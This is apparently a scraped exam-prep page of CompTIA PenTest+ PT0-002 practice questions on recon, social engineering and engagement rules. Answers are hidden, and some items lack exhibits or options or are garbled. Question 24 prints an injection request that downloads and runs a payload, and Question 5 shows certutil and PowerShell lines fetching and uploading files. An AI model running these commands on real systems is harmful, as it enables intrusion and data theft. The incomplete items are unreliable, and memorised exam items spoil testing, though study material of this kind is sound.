Black Friday Special Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: mxmas70

Home > CompTIA > PenTest+ > PT0-002

PT0-002 CompTIA PenTest+ Certification Exam Question and Answers

Question # 4

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

A.

Understanding the tactics of a security intrusion can help disrupt them.

B.

Scripts that are part of the framework can be imported directly into SIEM tools.

C.

The methodology can be used to estimate the cost of an incident better.

D.

The framework is static and ensures stability of a security program overtime.

Full Access
Question # 5

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A.

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.

schtasks /query /fo LIST /v | find /I “Next Run Time:”

Full Access
Question # 6

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

A.

Badge cloning

B.

Dumpster diving

C.

Tailgating

D.

Shoulder surfing

Full Access
Question # 7

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

A.

Ensure the client has signed the SOW.

B.

Verify the client has granted network access to the hot site.

C.

Determine if the failover environment relies on resources not owned by the client.

D.

Establish communication and escalation procedures with the client.

Full Access
Question # 8

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

A.

Multiple handshakes

B.

IP addresses

C.

Encrypted file transfers

D.

User hashes sent over SMB

Full Access
Question # 9

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client’s requirements?

A.

“cisco-ios” “admin+1234”

B.

“cisco-ios” “no-password”

C.

“cisco-ios” “default-passwords”

D.

“cisco-ios” “last-modified”

Full Access
Question # 10

A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A.

Windows

B.

Apple

C.

Linux

D.

Android

Full Access
Question # 11

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

A.

The libraries may be vulnerable

B.

The licensing of software is ambiguous

C.

The libraries’ code bases could be read by anyone

D.

The provenance of code is unknown

E.

The libraries may be unsupported

F.

The libraries may break the application

Full Access
Question # 12

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

A.

devices produce more heat and consume more power.

B.

devices are obsolete and are no longer available for replacement.

C.

protocols are more difficult to understand.

D.

devices may cause physical world effects.

Full Access
Question # 13

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router.

Which of the following is MOST vulnerable to a brute-force attack?

A.

WPS

B.

WPA2-EAP

C.

WPA-TKIP

D.

WPA2-PSK

Full Access
Question # 14

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A.

Analyze the malware to see what it does.

B.

Collect the proper evidence and then remove the malware.

C.

Do a root-cause analysis to find out how the malware got in.

D.

Remove the malware immediately.

E.

Stop the assessment and inform the emergency contact.

Full Access
Question # 15

A consulting company is completing the ROE during scoping.

Which of the following should be included in the ROE?

A.

Cost ofthe assessment

B.

Report distribution

C.

Testing restrictions

D.

Liability

Full Access
Question # 16

A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?

A.

nmap –p0 –T0 –sS 192.168.1.10

B.

nmap –sA –sV --host-timeout 60 192.168.1.10

C.

nmap –f --badsum 192.168.1.10

D.

nmap –A –n 192.168.1.10

Full Access
Question # 17

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

A.

Aircrack-ng

B.

Wireshark

C.

Wifite

D.

Kismet

Full Access
Question # 18

Which of the following expressions in Python increase a variable val by one (Choose two.)

A.

val++

B.

+val

C.

val=(val+1)

D.

++val

E.

val=val++

F.

val+=1

Full Access
Question # 19

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be

valid?

A.

PLCs will not act upon commands injected over the network.

B.

Supervisors and controllers are on a separate virtual network by default.

C.

Controllers will not validate the origin of commands.

D.

Supervisory systems will detect a malicious injection of code/commands.

Full Access
Question # 20

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

A.

Acceptance by the client and sign-off on the final report

B.

Scheduling of follow-up actions and retesting

C.

Attestation of findings and delivery of the report

D.

Review of the lessons learned during the engagement

Full Access
Question # 21

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

A.

Wait for the next login and perform a downgrade attack on the server.

B.

Capture traffic using Wireshark.

C.

Perform a brute-force attack over the server.

D.

Use an FTP exploit against the server.

Full Access
Question # 22

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 23

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

A.

Run another scanner to compare.

B.

Perform a manual test on the server.

C.

Check the results on the scanner.

D.

Look for the vulnerability online.

Full Access
Question # 24

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache’%0A%27 &loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

A.

grep –v apache ~/.bash_history > ~/.bash_history

B.

rm –rf /tmp/apache

C.

chmod 600 /tmp/apache

D.

taskkill /IM “apache” /F

Full Access
Question # 25

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?

A.

Phishing

B.

Tailgating

C.

Baiting

D.

Shoulder surfing

Full Access
Question # 26

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

A.

Weekly

B.

Monthly

C.

Quarterly

D.

Annually

Full Access
Question # 27

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A.

NDA

B.

MSA

C.

SOW

D.

MOU

Full Access
Question # 28

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Full Access
Question # 29

A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap –O –A –sS –p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

A.

A firewall or IPS blocked the scan.

B.

The penetration tester used unsupported flags.

C.

The edge network device was disconnected.

D.

The scan returned ICMP echo replies.

Full Access
Question # 30

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.

In which of the following places should the penetration tester look FIRST for the employees’ numbers?

A.

Web archive

B.

GitHub

C.

File metadata

D.

Underground forums

Full Access
Question # 31

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

A.

Whether the cloud service provider allows the penetration tester to test the environment

B.

Whether the specific cloud services are being used by the application

C.

The geographical location where the cloud services are running

D.

Whether the country where the cloud service is based has any impeding laws

Full Access
Question # 32

A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

A.

nmap –f –sV –p80 192.168.1.20

B.

nmap –sS –sL –p80 192.168.1.20

C.

nmap –A –T4 –p80 192.168.1.20

D.

nmap –O –v –p80 192.168.1.20

Full Access
Question # 33

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

A.

Wireshark

B.

Nessus

C.

Retina

D.

Burp Suite

E.

Shodan

F.

Nikto

Full Access
Question # 34

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

A.

Nmap

B.

tcpdump

C.

Scapy

D.

hping3

Full Access
Question # 35

Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

A.

Website scraping

B.

Website cloning

C.

Domain enumeration

D.

URL enumeration

Full Access
Question # 36

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

A.

Shodan

B.

Nmap

C.

WebScarab-NG

D.

Nessus

Full Access
Question # 37

A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?

A.

Perform a new penetration test.

B.

Remediate the findings.

C.

Provide the list of common vulnerabilities and exposures.

D.

Broaden the scope of the penetration test.

Full Access
Question # 38

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Full Access
Question # 39

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

A.

dig company.com MX

B.

whois company.com

D.

dig company.com A

Full Access
Question # 40

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

A.

As backup in case the original documents are lost

B.

To guide them through the building entrances

C.

To validate the billing information with the client

D.

As proof in case they are discovered

Full Access
Question # 41

A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?

A.

GDB

B.

Burp Suite

C.

SearchSpliot

D.

Netcat

Full Access
Question # 42

An organization wants to identify whether a less secure protocol is being utilized on a wireless network. Which of the following types of attacks will achieve this goal?

A.

Protocol negotiation

B.

Packet sniffing

C.

Four-way handshake

D.

Downgrade attack

Full Access
Question # 43

A penetration tester writes the following script:

Which of the following is the tester performing?

A.

Searching for service vulnerabilities

B.

Trying to recover a lost bind shell

C.

Building a reverse shell listening on specified ports

D.

Scanning a network for specific open ports

Full Access
Question # 44

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?

A.

windows/x64/meterpreter/reverse_tcp

B.

windows/x64/meterpreter/reverse_http

C.

windows/x64/shell_reverse_tcp

D.

windows/x64/powershell_reverse_tcp

E.

windows/x64/meterpreter/reverse_https

Full Access
Question # 45

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

A.

Weak authentication schemes

B.

Credentials stored in strings

C.

Buffer overflows

D.

Non-optimized resource management

Full Access
Question # 46

Given the following script:

while True:

print ("Hello World")

Which of the following describes True?

A.

A while loop

B.

A conditional

C.

A Boolean operator

D.

An arithmetic operator

Full Access
Question # 47

A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?

A.

Netcraft

B.

CentralOps

C.

Responder

D.

FOCA

Full Access
Question # 48

Given the following script:

Which of the following BEST characterizes the function performed by lines 5 and 6?

A.

Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10

B.

Performs a single DNS query for www.comptia.org and prints the raw data output

C.

Loops through variable b to count the results returned for the DNS query and prints that count to screen

D.

Prints each DNS query result already stored in variable b

Full Access
Question # 49

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

A.

/var/log/messages

B.

/var/log/last_user

C.

/var/log/user_log

D.

/var/log/lastlog

Full Access
Question # 50

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A.

A vulnerability scan

B.

A WHOIS lookup

C.

A packet capture

D.

An Nmap scan

Full Access
Question # 51

A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

A.

Configure wireless access to use a AAA server.

B.

Use random MAC addresses on the penetration testing distribution.

C.

Install a host-based firewall on the penetration testing distribution.

D.

Connect to the penetration testing company's VPS using a VPN.

Full Access
Question # 52

A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?

A.

Send an SMS with a spoofed service number including a link to download a malicious application.

B.

Exploit a vulnerability in the MDM and create a new account and device profile.

C.

Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.

D.

Infest a website that is often used by employees with malware targeted toward x86 architectures.

Full Access
Question # 53

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 54

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

A.

Shoulder surfing

B.

Call spoofing

C.

Badge stealing

D.

Tailgating

E.

Dumpster diving

F.

Email phishing

Full Access
Question # 55

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

A.

After detection of a breach

B.

After a merger or an acquisition

C.

When an organization updates its network firewall configurations

D.

When most of the vulnerabilities have been remediated

Full Access
Question # 56

After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:

Which of the following actions should the tester perform FIRST?

A.

Change the file permissions.

B.

Use privilege escalation.

C.

Cover tracks.

D.

Start a reverse shell.

Full Access
Question # 57

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?

A.

Redact identifying information and provide a previous customer's documentation.

B.

Allow the client to only view the information while in secure spaces.

C.

Determine which reports are no longer under a period of confidentiality.

D.

Provide raw output from penetration testing tools.

Full Access
Question # 58

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?

A.

Password brute force attack

B.

SQL injection

C.

Password spraying

D.

Kerberoasting

Full Access
Question # 59

A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?

A.

The injection was too slow.

B.

The DNS information was incorrect.

C.

The DNS cache was not refreshed.

D.

The client did not receive a trusted response.

Full Access
Question # 60

In Python socket programming, SOCK_DGRAM type is:

A.

reliable.

B.

matrixed.

C.

connectionless.

D.

slower.

Full Access
Question # 61

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

A.

Nessus

B.

Metasploit

C.

Burp Suite

D.

Ethercap

Full Access
Question # 62

During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below.

Which of the following vulnerabilities was the attacker trying to exploit?

A.

..Session hijacking

B.

..URL manipulation

C.

..SQL injection

D.

..Insecure direct object reference

Full Access
Question # 63

Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

A.

MSA

B.

NDA

C.

SOW

D.

ROE

Full Access
Question # 64

A penetration tester wrote the following Bash script to brute force a local service password:

..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

A.

..e

cho "The correct password is $p" && break)

ho "The correct password is $p" I| break

B.

.e

cho "The correct password is $p" && break)

o "The correct password is $p" I break

C.

e

cho "The correct password is Sp" && break)

echo "The correct password is $p" && break)

D.

.

{ echo "The correct password is $p" && break )

With

E.

( echo "The correct password is $p" && break )

Full Access
Question # 65

Which of the following documents describes activities that are prohibited during a scheduled penetration test?

A.

MSA

B.

NDA

C.

ROE

D.

SLA

Full Access
Question # 66

A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.

Which of the following methods will MOST likely work?

A.

Try to obtain the private key used for S/MIME from the CEO's account.

B.

Send an email from the CEO's account, requesting a new account.

C.

Move laterally from the mail server to the domain controller.

D.

Attempt to escalate privileges on the mail server to gain root access.

Full Access
Question # 67

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

A.

To provide protection against host OS vulnerabilities

B.

To reduce the probability of a VM escape attack

C.

To fix any misconfigurations of the hypervisor

D.

To enable all features of the hypervisor

Full Access
Question # 68

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

A.

An unknown-environment assessment

B.

A known-environment assessment

C.

A red-team assessment

D.

A compliance-based assessment

Full Access
Question # 69

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?

A.

A list

B.

A tree

C.

A dictionary

D.

An array

Full Access
Question # 70

A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:

Which of the following should the penetration tester do NEXT?

A.

Close the reverse shell the tester is using.

B.

Note this finding for inclusion in the final report.

C.

Investigate the high numbered port connections.

D.

Contact the client immediately.

Full Access
Question # 71

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code? salt = ‘123’ hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) The tester recommended the code be updated to the following salt = os.urandom(32) hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?

A.

Changing passwords that were created before this code update

B.

Keeping hashes created by both methods for compatibility

C.

Rehashing all old passwords with the new code

D.

Replacing the SHA-256 algorithm to something more secure

Full Access
Question # 72

A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

A.

Nmap

B.

Nikto

C.

Cain and Abel

D.

Ethercap

Full Access
Question # 73

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

A.

Peach

B.

WinDbg

C.

GDB

D.

OllyDbg

Full Access
Question # 74

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

A.

Active scanning

B.

Ping sweep

C.

Protocol reversing

D.

Packet analysis

Full Access
Question # 75

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

A.

security compliance regulations or laws may be violated.

B.

testing can make detecting actual APT more challenging.

C.

testing adds to the workload of defensive cyber- and threat-hunting teams.

D.

business and network operations may be impacted.

Full Access
Question # 76

A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

A.

Dumpster diving

B.

Phishing

C.

Shoulder surfing

D.

Tailgating

Full Access
Question # 77

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?

A.

Continue the assessment and mark the finding as critical.

B.

Attempting to remediate the issue temporally.

C.

Notify the primary contact immediately.

D.

Shutting down the web server until the assessment is finished

Full Access
Question # 78

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

Full Access
Question # 79

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

A.

Spawned shells

B.

Created user accounts

C.

Server logs

D.

Administrator accounts

E.

Reboot system

F.

ARP cache

Full Access
Question # 80

A company provided the following network scope for a penetration test:

169.137.1.0/24

221.10.1.0/24

149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

A.

The company that requested the penetration test

B.

The penetration testing company

C.

The target host's owner

D.

The penetration tester

E.

The subcontractor supporting the test

Full Access
Question # 81

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

A.

Open-source research

B.

A ping sweep

C.

Traffic sniffing

D.

Port knocking

E.

A vulnerability scan

F.

An Nmap scan

Full Access
Question # 82

Which of the following components should a penetration tester most likely include in a report at the end of an assessment?

A.

Metrics and measures

B.

Client interviews

C.

Compliance information

D.

Business policies

Full Access
Question # 83

Given the following Nmap scan command:

[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

A.

1

B.

101

C.

255

D.

256

Full Access
Question # 84

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

A.

Bluejacking

B.

Bluesnarfing

C.

BLE attack

D.

WPS PIN attack

Full Access
Question # 85

A penetration tester is attempting to perform reconnaissance on a customer's external-facing footprint and reviews a summary of the fingerprinting scans:

SSH servers: 23

NTP servers: 4

Rsync servers: 5

LDAP servers: 2

Which of the following OSs is the organization most likely using?

A.

Mac OS X

B.

FreeBSD

C.

Microsoft Windows

D.

Linux

Full Access
Question # 86

A penetration tester is conducting an assessment on a web application. Which of the following active reconnaissance techniques would be best for the tester to use to gather additional information about the application?

A.

Using cURL with the verbose option

B.

Crawling UR Is using an interception proxy

C.

Using Scapy for crafted requests

D.

Crawling URIs using a web browser

Full Access
Question # 87

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:

nmap -sV -- script ssl-enum-ciphers -p 443 remotehost

| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

| TLS_ECDHE_RSA_WITH_RC4_128_SHA

| TLS_RSA_WITH_RC4_128_SHA (rsa 2048)

TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)

Which of the following should the penetration tester include in the report?

A.

Old, insecure ciphers are in use.

B.

The 3DES algorithm should be deprecated.

C.

2,048-bit symmetric keys are incompatible with MD5.

D.

This server should be upgraded to TLS 1.2.

Full Access
Question # 88

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Full Access
Question # 89

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A.

chmod u+x script.sh

B.

chmod u+e script.sh

C.

chmod o+e script.sh

D.

chmod o+x script.sh

Full Access
Question # 90

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

A.

Determine active hosts on the network.

B.

Set the TTL of ping packets for stealth.

C.

Fill the ARP table of the networked devices.

D.

Scan the system on the most used ports.

Full Access
Question # 91

A penetration tester uses Hashcat to crack hashes discovered during a penetration test and obtains the following output:

ad09cd16529b5f5a40a3e15344e57649f4a43a267a97f008af01af803603c4c8 : Summer2023 !!

7945bb2bb08731fc8d57680ffa4aefec91c784d231de029c610b778eda5ef48b:p@ssWord123

ea88ceab69cb2fb8bdcf9ef4df884af219fffbffab473ec13f20326dc6f84d13: Love-You999

Which of the following is the best way to remediate the penetration tester's discovery?

A.

Requiring passwords to follow complexity rules

B.

Implementing a blocklist of known bad passwords

C.

Setting the minimum password length to ten characters

D.

Encrypting the passwords with a stronger algorithm

Full Access
Question # 92

During an assessment, a penetration tester found an application with the default credentials enabled. Which of the following best describes the technical control required to fix this issue?

A.

Password encryption

B.

System hardening

C.

Multifactor authentication

D.

Patch management

Full Access
Question # 93

A penetration tester is looking for a particular type of service and obtains the output below:

I Target is synchronized with 127.127.38.0 (reference clock)

I Alternative Target Interfaces:

I 10.17.4.20

I Private Servers (0)

I Public Servers (0)

I Private Peers (0)

I Public Peers (0)

I Private Clients (2)

I 10.20.8.69 169.254.138.63

I Public Clients (597)

I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152

I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118

I 68.56.205.98

I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2

I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682

I Other Associations (1)

|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7

Which of the following commands was executed by the tester?

A.

nmap-sU-pU:517-Pn-n—script=supermicro-ipmi-config

B.

nmap-sU-pU:123-Pn-n—script=ntp-monlist

C.

nmap-sU-pU:161-Pn-n—script«voldemort-info

D.

nmap-sU-pU:37 -Pn -n —script=icap-info

Full Access
Question # 94

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Full Access
Question # 95

An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?

A.

Device log facility does not record actions.

B.

End users have root access by default.

C.

Unsigned applications can be installed.

D.

Push notification services require internet.

Full Access
Question # 96

A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

A.

Wireshark

B.

Aircrack-ng

C.

Kismet

D.

Wifite

Full Access
Question # 97

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

A.

Implementation of patching and change control programs

B.

Revision of client scripts used to perform system updates

C.

Remedial training for the client's systems administrators

D.

Refrainment from patching systems until quality assurance approves

Full Access
Question # 98

A penetration tester developed the following script to be used during an engagement:

#!/usr/bin/python

import socket, sys

ports = [21, 22, 23, 25, 80, 139, 443, 445, 3306, 3389]

if len(sys.argv) > 1:

target = socket.gethostbyname (sys. argv [0])

else:

print ("Few arguments.")

print ("Syntax: python {} ". format (sys. argv [0]))

sys.exit ()

try:

for port in ports:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

s.settimeout (2)

result = s.connect_ex ((target, port) )

if result == 0:

print ("Port {} is opened". format (port) )

except KeyboardInterrupt:

print ("\nExiting ... ")

sys.exit ()

However, when the penetration tester ran the script, the tester received the following message:

socket.gaierror: [Errno -2] Name or service not known

Which of the following changes should the penetration tester implement to fix the script?

A.

From:

target = socket.gethostbyname (sys. argv [0])

To:

target = socket.gethostbyname (sys.argv[1])

B.

From:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

To:

s = socket.socket (socket.AF_INET, socket. SOCK_DGRAM)

C.

From:

import socket, sys

To:

import socket

import sys

D.

From:

result = s.connect_ex ((target, port) )

To:

result = s.connect ( (target, port) )

Full Access
Question # 99

Which of the following is a ROE component that provides a penetration tester with guidance on who and how to contact the necessary individuals in the event of a disaster during an engagement?

A.

Engagementscope

B.

Communication escalation path

C.

SLA

D.

SOW

Full Access
Question # 100

Which of the following members of a client organization are most likely authorized to provide a signed authorization letter prior to the start date of a penetration test?

A.

The IT department

B.

The executive management team and legal personnel

C.

Organizational security personnel

D.

The human resources team

Full Access
Question # 101

Which of the following tools would be best to use to conceal data in various kinds of image files?

A.

Kismet

B.

Snow

C.

Responder

D.

Metasploit

Full Access
Question # 102

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?

A.

OWASP

B.

MITRE ATT&CK

C.

PTES

D.

NIST

Full Access
Question # 103

A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next?

A.

Vishing

B.

Watering hole

C.

Whaling

D.

Spear phishing

Full Access
Question # 104

Which of the following assessment methods is the most likely to cause harm to an ICS environment?

A.

Active scanning

B.

Ping sweep

C.

Protocol reversing

D.

Packet analysis

Full Access
Question # 105

Given the following user-supplied data:

www.comptia.com/info.php?id=1 AND 1=1

Which of the following attack techniques is the penetration tester likely implementing?

A.

Boolean-based SQL injection

B.

Time-based SQL injection

C.

Stored cross-site scripting

D.

Reflected cross-site scripting

Full Access
Question # 106

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?

A.

Executive summary

B.

Vulnerability severity rating

C.

Recommendations of mitigation

D.

Methodology

Full Access
Question # 107

A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

A.

Credential harvesting

B.

Privilege escalation

C.

Password spraying

D.

Domain record abuse

Full Access
Question # 108

A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?

A.

Include the findings in the final report.

B.

Notify the client immediately.

C.

Document which commands can be executed.

D.

Use this feature to further compromise the server.

Full Access
Question # 109

A penetration tester wrote the following script on a compromised system:
